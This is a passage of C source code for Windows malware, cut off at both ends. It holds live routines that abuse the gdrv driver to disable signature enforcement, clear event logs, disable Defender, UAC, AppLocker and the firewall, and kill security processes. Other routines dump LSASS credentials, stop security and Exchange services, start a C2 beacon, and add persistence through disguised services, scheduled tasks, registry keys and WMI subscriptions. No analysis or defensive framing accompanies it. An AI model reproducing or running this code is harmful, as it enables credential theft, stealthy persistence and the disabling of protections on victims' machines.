L"gdrv", SERVICE_START | SERVICE_STOP | DELETE); if (!svc) { CloseServiceHandle(scm); return FALSE; } if (!StartServiceW(svc, 0, NULL)) { DeleteService(svc); CloseServiceHandle(svc); CloseServiceHandle(scm); return FALSE; } CloseServiceHandle(svc); CloseServiceHandle(scm); return TRUE; } ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen) { for (DWORD i = 0; i < size - patternLen; i++) { BOOL found = TRUE; for (DWORD j = 0; j < patternLen; j++) { if (pattern[j] != 0x00 && base[i + j] != pattern[j]) { found = FALSE; break; } } if (found) return (ULONGLONG)(base + i); } return 0; } ULONGLONG WalkPageTable(PVOID virtualAddr) { return (ULONGLONG)virtualAddr; } BOOL DisableDSEviaGdrv() { HANDLE hDevice = CreateFileW(GDRV_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) return FALSE; DWORD bytesReturned; LPVOID kernelBase = GetModuleHandleW(L"ntoskrnl.exe"); if (kernelBase) { BYTE pattern[] = { 0x8A, 0x05, 0x00, 0x00, 0x00, 0x00, 0xC3 }; ULONGLONG ciOptionsAddr = FindPattern((BYTE*)kernelBase, 0x2000000, pattern, sizeof(pattern)); if (ciOptionsAddr) { DWORD* relAddr = (DWORD*)(ciOptionsAddr + 2); ULONGLONG targetAddr = ciOptionsAddr + 6 + *relAddr; ULONGLONG physicalAddr = WalkPageTable((PVOID)targetAddr); if (physicalAddr) { BYTE newValue = CI_OPTIONS_DISABLE_DSE; DeviceIoControl(hDevice, GDRV_IOCTL_WRITE_PHYSICAL, &physicalAddr, sizeof(physicalAddr), &newValue, sizeof(newValue), &bytesReturned, NULL); } } } CloseHandle(hDevice); return TRUE; } BOOL EnableKernelExecution() { if (!LoadGdrvDriver()) return FALSE; Sleep(2000); if (!DisableDSEviaGdrv()) return FALSE; return TRUE; } // ==================== PPL BYPASS ==================== BOOL EnablePPL() { HANDLE hToken; if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { TOKEN_PRIVILEGES tp; LUID luid; if (LookupPrivilegeValueW(NULL, SE_TCB_NAME, &luid)) { tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); pNtSetInformationProcess NtSetInformationProcess = (pNtSetInformationProcess)GetProcAddress(hNtdll, "NtSetInformationProcess"); PS_PROTECTION protection; protection.Level = 0x72; NTSTATUS status = NtSetInformationProcess(GetCurrentProcess(), 0x3D, &protection, sizeof(protection)); if (status == 0) { CloseHandle(hToken); return TRUE; } } CloseHandle(hToken); } return FALSE; } void RunAsPPL() { EnablePPL(); } // ==================== ANTI-FORENSICS ==================== void ScrambleMemory() { for (int i = 0; i < 100; i++) { LPVOID ptr = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); if (ptr) { RtlFillMemory(ptr, 4096, 0xCC); DWORD oldProtect; VirtualProtect(ptr, 4096, PAGE_NOACCESS, &oldProtect); } } } BOOL HideFile(LPCWSTR filePath) { return SetFileAttributesW(filePath, FILE_ATTRIBUTE_HIDDEN); } BOOL ClearEventLogs() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\wevtutil.exe", L"wevtutil cl System", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } CreateProcessW(L"C:\\Windows\\System32\\wevtutil.exe", L"wevtutil cl Security", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } CreateProcessW(L"C:\\Windows\\System32\\wevtutil.exe", L"wevtutil cl Application", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } return TRUE; } BOOL AddToStartup(LPCWSTR appPath) { HKEY hKey; if (RegCreateKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ, (BYTE*)appPath, (DWORD)(wcslen(appPath) * sizeof(WCHAR))); RegCloseKey(hKey); return TRUE; } return FALSE; } BOOL InstallBootkitComponents() { HKEY hKey; if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { wchar_t data[] = L"autocheck autochk *"; RegSetValueExW(hKey, L"BootExecute", 0, REG_MULTI_SZ, (BYTE*)data, (DWORD)((wcslen(data) + 1) * sizeof(wchar_t))); RegCloseKey(hKey); } if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { wchar_t exePath[MAX_PATH]; GetModuleFileNameW(NULL, exePath, MAX_PATH); RegSetValueExW(hKey, L"Userinit", 0, REG_SZ, (BYTE*)exePath, (DWORD)(wcslen(exePath) * sizeof(wchar_t))); RegCloseKey(hKey); } return TRUE; } BOOL KillProcessByName(LPCWSTR processName) { HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snapshot == INVALID_HANDLE_VALUE) return FALSE; PROCESSENTRY32W pe = { sizeof(pe) }; if (Process32FirstW(snapshot, &pe)) { do { if (_wcsicmp(pe.szExeFile, processName) == 0) { HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID); if (hProc) { TerminateProcess(hProc, 0); CloseHandle(hProc); } } } while (Process32NextW(snapshot, &pe)); } CloseHandle(snapshot); return TRUE; } BOOL BypassUAC() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; wchar_t systemRoot[MAX_PATH]; GetEnvironmentVariableW(L"SystemRoot", systemRoot, MAX_PATH); wchar_t wusaPath[MAX_PATH]; swprintf(wusaPath, MAX_PATH, L"%ls\\System32\\wusa.exe", systemRoot); CopyFileW(wusaPath, L"C:\\Windows\\Temp\\wusa.exe", FALSE); if (CreateProcessW(NULL, L"C:\\Windows\\Temp\\wusa.exe /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { WaitForSingleObject(pi.hProcess, 1000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return TRUE; } return FALSE; } BOOL InstallServicePersistence() { wchar_t exePath[MAX_PATH]; GetModuleFileNameW(NULL, exePath, MAX_PATH); SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (!scm) return FALSE; SC_HANDLE svc = CreateServiceW(scm, L"WindowsUpdateService", L"Windows Update Service", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, exePath, NULL, NULL, NULL, NULL, NULL); if (!svc && GetLastError() == ERROR_SERVICE_EXISTS) { svc = OpenServiceW(scm, L"WindowsUpdateService", SERVICE_ALL_ACCESS); } if (svc) { StartServiceW(svc, 0, NULL); CloseServiceHandle(svc); } CloseServiceHandle(scm); return TRUE; } BOOL DisableFirewall() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\netsh.exe", L"netsh advfirewall set allprofiles state off", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } return TRUE; } BOOL AddExclusionToDefender(LPCWSTR path) { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; wchar_t cmd[MAX_PATH * 2]; swprintf(cmd, MAX_PATH * 2, L"powershell -Command \"Add-MpPreference -ExclusionPath '%ls'\"", path); CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } return TRUE; } BOOL SelfDelete() { wchar_t exePath[MAX_PATH]; GetModuleFileNameW(NULL, exePath, MAX_PATH); wchar_t cmd[MAX_PATH + 128]; swprintf(cmd, MAX_PATH + 128, L"/c ping 127.0.0.1 -n 3 > nul & del /f \"%ls\"", exePath); STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } return TRUE; } // ==================== NETWORK C2 SETUP ==================== void NetworkC2Setup() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\netsh.exe", L"netsh advfirewall firewall add rule name=\"Windows Update\" dir=out action=allow protocol=TCP remoteport=443", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } HKEY hKey; if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { DWORD enableAutoDoh = 2; RegSetValueExW(hKey, L"EnableAutoDoh", 0, REG_DWORD, (BYTE*)&enableAutoDoh, sizeof(enableAutoDoh)); RegCloseKey(hKey); } HANDLE hThread = CreateThread(NULL, 0, BeaconThread, NULL, 0, NULL); if (hThread) CloseHandle(hThread); wchar_t exePath[MAX_PATH]; GetModuleFileNameW(NULL, exePath, MAX_PATH); wchar_t regCmd[MAX_PATH * 2]; swprintf(regCmd, MAX_PATH * 2, L"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v WindowsUpdate /t REG_SZ /d \"\\\"%s\\\"\" /f", exePath); CreateProcessW(L"C:\\Windows\\System32\\reg.exe", regCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } } // ==================== BYPASS FUNCTIONS ==================== BOOL TakeOwnershipAndGrantFullControl(LPCWSTR subkey) { HKEY hKey; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey, 0, WRITE_OWNER | WRITE_DAC, &hKey) != ERROR_SUCCESS) return FALSE; SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY; PSID adminGroupSid = NULL; AllocateAndInitializeSid(&ntAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0,0,0,0,0,0, &adminGroupSid); BOOL result = SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, adminGroupSid, NULL, NULL, NULL) == ERROR_SUCCESS; if (result) { EXPLICIT_ACCESS_W ea = {0}; ea.grfAccessPermissions = KEY_ALL_ACCESS; ea.grfAccessMode = SET_ACCESS; ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT; ea.Trustee.TrusteeForm = TRUSTEE_IS_SID; ea.Trustee.TrusteeType = TRUSTEE_IS_GROUP; ea.Trustee.ptstrName = (LPWSTR)adminGroupSid; PACL newAcl = NULL; result = SetEntriesInAclW(1, &ea, NULL, &newAcl) == ERROR_SUCCESS && SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, newAcl, NULL) == ERROR_SUCCESS; if (newAcl) LocalFree(newAcl); } FreeSid(adminGroupSid); RegCloseKey(hKey); return result; } BOOL DisableTamperProtection() { LPCWSTR tpKey = L"SOFTWARE\\Microsoft\\Windows Defender\\Features"; if (!TakeOwnershipAndGrantFullControl(tpKey)) return FALSE; HKEY hKey; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, tpKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { DWORD zero = 0; LONG ret = RegSetValueExW(hKey, L"TamperProtection", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); RegCloseKey(hKey); return (ret == ERROR_SUCCESS); } return FALSE; } void DisableDefender() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; LPCWSTR commands[] = { L"powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"", L"powershell -Command \"Set-MpPreference -DisableBehaviorMonitoring $true\"", L"powershell -Command \"Set-MpPreference -DisableBlockAtFirstSeen $true\"", L"powershell -Command \"Set-MpPreference -DisableIOAVProtection $true\"", L"powershell -Command \"Set-MpPreference -DisablePrivacyMode $true\"", L"powershell -Command \"Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true\"", L"powershell -Command \"Set-MpPreference -DisableArchiveScanning $true\"", L"powershell -Command \"Set-MpPreference -DisableIntrusionPreventionSystem $true\"", L"powershell -Command \"Set-MpPreference -DisableScriptScanning $true\"", L"powershell -Command \"Set-MpPreference -DisableCatchupFullScan $true\"", L"powershell -Command \"Set-MpPreference -DisableCatchupQuickScan $true\"", L"powershell -Command \"Set-MpPreference -MAPSReporting 0\"", L"powershell -Command \"Set-MpPreference -CloudBlockLevel 0\"", L"powershell -Command \"Set-MpPreference -CloudTimeout 1\"", L"powershell -Command \"Set-MpPreference -SubmitSamplesConsent 2\"", L"powershell -Command \"Set-MpPreference -PUAProtection 0\"", L"powershell -Command \"Set-MpPreference -HighThreatDefaultAction 6 -Force\"", L"powershell -Command \"Set-MpPreference -LowThreatDefaultAction 6 -Force\"", L"powershell -Command \"Set-MpPreference -ModerateThreatDefaultAction 6 -Force\"", L"powershell -Command \"Set-MpPreference -SevereThreatDefaultAction 6 -Force\"", L"powershell -Command \"Remove-MpPreference -ExclusionPath C:\\ -ErrorAction SilentlyContinue\"" }; for (int i = 0; i < sizeof(commands)/sizeof(commands[0]); i++) { CreateProcessW(NULL, (LPWSTR)commands[i], NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 1000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } } SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (scm) { SC_HANDLE svc = OpenServiceW(scm, L"WinDefend", SERVICE_STOP | SERVICE_CHANGE_CONFIG); if (svc) { SERVICE_STATUS status; ControlService(svc, SERVICE_CONTROL_STOP, &status); ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(svc); } SC_HANDLE wdNisSvc = OpenServiceW(scm, L"WdNisSvc", SERVICE_STOP | SERVICE_CHANGE_CONFIG); if (wdNisSvc) { SERVICE_STATUS status; ControlService(wdNisSvc, SERVICE_CONTROL_STOP, &status); ChangeServiceConfigW(wdNisSvc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(wdNisSvc); } CloseServiceHandle(scm); } } void KillDefenderProcesses() { PROCESSENTRY32W entry = { sizeof(entry) }; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snapshot == INVALID_HANDLE_VALUE) return; LPCWSTR targets[] = { L"MsMpEng.exe", L"NisSrv.exe", L"MpCmdRun.exe", L"SecurityHealthService.exe", L"MsMpEngCP.exe" }; for (int i = 0; i < 5; i++) { if (Process32FirstW(snapshot, &entry)) { do { if (_wcsicmp(entry.szExeFile, targets[i]) == 0) { HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, entry.th32ProcessID); if (hProc) { TerminateProcess(hProc, 0); CloseHandle(hProc); } } } while (Process32NextW(snapshot, &entry)); } Process32FirstW(snapshot, &entry); } CloseHandle(snapshot); } void DisableUAC() { HKEY hKey; DWORD zero = 0; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); RegSetValueExW(hKey, L"PromptOnSecureDesktop", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); RegCloseKey(hKey); } } void DisableAppLockerWDAC() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\net.exe", L"net stop appidsvc /y", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (scm) { SC_HANDLE svc = OpenServiceW(scm, L"AppIDSvc", SERVICE_CHANGE_CONFIG); if (svc) { ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(svc); } CloseServiceHandle(scm); } DeleteFileW(L"C:\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b"); DeleteFileW(L"C:\\Windows\\System32\\CodeIntegrity\\SIPolicy.p7b"); HKEY hKey; DWORD zero = 0; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\SystemGuard", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); RegCloseKey(hKey); } if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Policies\\Microsoft\\Windows\\AppLocker", 0, KEY_SET_VALUE | KEY_WOW64_64KEY, &hKey) == ERROR_SUCCESS) { RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); RegCloseKey(hKey); } } void AddDefenderExclusions() { wchar_t exePath[MAX_PATH]; GetModuleFileNameW(NULL, exePath, MAX_PATH); STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; wchar_t cmd[MAX_PATH + 128]; swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionPath '%s'\"", exePath); CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionProcess '%s'\"", exePath); CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionExtension '.exe'\""); CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionPath C:\\\""); CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } } void DisableSecurityLogs() { HKEY hKey; DWORD enableMiniNt = 1; RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\MiniNt", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL); RegSetValueExW(hKey, NULL, 0, REG_DWORD, (BYTE*)&enableMiniNt, sizeof(enableMiniNt)); RegCloseKey(hKey); DWORD disableAudit = 1; RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL); RegSetValueExW(hKey, L"auditbaseobjects", 0, REG_DWORD, (BYTE*)&disableAudit, sizeof(disableAudit)); RegCloseKey(hKey); } void DisableSystemRestore() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell -Command \"Disable-ComputerRestore -Drive 'C:\\'\"", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } HKEY hKey; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { DWORD disableSR = 1; RegSetValueExW(hKey, L"DisableSR", 0, REG_DWORD, (BYTE*)&disableSR, sizeof(disableSR)); RegSetValueExW(hKey, L"DisableConfig", 0, REG_DWORD, (BYTE*)&disableSR, sizeof(disableSR)); RegCloseKey(hKey); } } void DropTelemetryPackets() { STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; LPCWSTR domains[] = { L"telemetry.microsoft.com", L"vortex-win.data.microsoft.com", L"settings-win.data.microsoft.com", L"watson.telemetry.microsoft.com", L"vortex.data.microsoft.com", L"vortex-sandbox.data.microsoft.com", L"officeclient.microsoft.com", L"oca.telemetry.microsoft.com" }; for (int i = 0; i < 8; i++) { WCHAR cmd[512]; swprintf(cmd, 512, L"cmd.exe /c \"echo 0.0.0.0 %ls >> %%WINDIR%%\\System32\\drivers\\etc\\hosts\"", domains[i]); CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 1000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } } } void DumpLSASS() { DWORD lsassPid = 0; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snapshot != INVALID_HANDLE_VALUE) { PROCESSENTRY32W pe = { sizeof(pe) }; if (Process32FirstW(snapshot, &pe)) { do { if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { lsassPid = pe.th32ProcessID; break; } } while (Process32NextW(snapshot, &pe)); } CloseHandle(snapshot); } if (lsassPid) { EnableDebugPrivilege(); HANDLE hLsass = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, lsassPid); if (hLsass) { HANDLE hFile = CreateFileW(L"C:\\lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL); if (hFile != INVALID_HANDLE_VALUE) { MiniDumpWriteDump(hLsass, lsassPid, hFile, MiniDumpWithFullMemory, NULL, NULL, NULL); CloseHandle(hFile); } CloseHandle(hLsass); } STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", L"cmd.exe /c vssadmin create shadow /for=C: > nul", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 10000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } } } void StopSecurityServices() { const wchar_t* services[] = { L"Sense", L"SgrmBroker", L"WdBoot", L"WdFilter", L"WdNisDrv", L"WinDefend", L"SecurityHealthService", L"wscsvc", L"W3SVC", L"MSExchange", L"MSExchangeDelivery", L"MSExchangeFrontendTransport", L"MSExchangeMailboxReplication", L"MSExchangeSubmission", L"MSExchangeThrottling", L"MicrosoftUpdate", L"BITS", L"wuauserv" }; SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (!scm) return; for (int i = 0; i < sizeof(services)/sizeof(services[0]); i++) { SC_HANDLE svc = OpenServiceW(scm, services[i], SERVICE_STOP | SERVICE_QUERY_STATUS); if (svc) { SERVICE_STATUS status; ControlService(svc, SERVICE_CONTROL_STOP, &status); ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(svc); } } CloseServiceHandle(scm); } void AddPersistence() { wchar_t cmd[MAX_PATH]; GetModuleFileNameW(NULL, cmd, MAX_PATH); STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; wchar_t taskCmd[1024]; swprintf(taskCmd, 1024, L"schtasks /create /tn \"WindowsUpdateTask\" /tr \"%s\" /sc onlogon /ru SYSTEM /f", cmd); CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", taskCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } swprintf(taskCmd, 1024, L"schtasks /create /tn \"MicrosoftUpdateTask\" /tr \"%s\" /sc daily /st 09:00 /ru SYSTEM /f", cmd); CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", taskCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } HKEY hKey; if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\svchost.exe", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { wchar_t debugger[MAX_PATH]; GetModuleFileNameW(NULL, debugger, MAX_PATH); RegSetValueExW(hKey, L"Debugger", 0, REG_SZ, (BYTE*)debugger, (DWORD)(wcslen(debugger) * sizeof(wchar_t))); RegCloseKey(hKey); } if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { wchar_t debugger[MAX_PATH]; GetModuleFileNameW(NULL, debugger, MAX_PATH); RegSetValueExW(hKey, L"Debugger", 0, REG_SZ, (BYTE*)debugger, (DWORD)(wcslen(debugger) * sizeof(wchar_t))); RegCloseKey(hKey); } if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\svchost.exe", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { DWORD flags = 0x2; RegSetValueExW(hKey, L"MitigationOptions", 0, REG_BINARY, (BYTE*)&flags, sizeof(flags)); wchar_t monitorPath[MAX_PATH]; GetModuleFileNameW(NULL, monitorPath, MAX_PATH); RegSetValueExW(hKey, L"MonitorProcess", 0, REG_SZ, (BYTE*)monitorPath, (DWORD)(wcslen(monitorPath) * sizeof(wchar_t))); RegCloseKey(hKey); } InstallServicePersistence(); AddToStartup(cmd); } void AddWmiPersistence() { wchar_t exePath[MAX_PATH]; GetModuleFileNameW(NULL, exePath, MAX_PATH); wchar_t psCmd[4096]; swprintf(psCmd, 4096, L"powershell -Command \"$filterArgs=@{Name='StartupFilter';EventNameSpace='root\\cimv2';QueryLanguage='WQL';Query=\\\"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='explorer.exe'\\\"}; $filter=Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments $filterArgs -ErrorAction SilentlyContinue; $consumerArgs=@{Name='StartupConsumer';CommandLineTemplate='%ls'}; $consumer=Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\\subscription -Arguments $consumerArgs -ErrorAction SilentlyContinue; $bindingArgs=@{Filter=$filter; Consumer=$consumer}; Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\\subscription -Arguments $bindingArgs -ErrorAction SilentlyContinue; $filterTimerArgs=@{Name='TimerFilter';EventNameSpace='root\\cimv2';QueryLanguage='WQL';Query=\\\"SELECT * FROM __TimerEvent WHERE 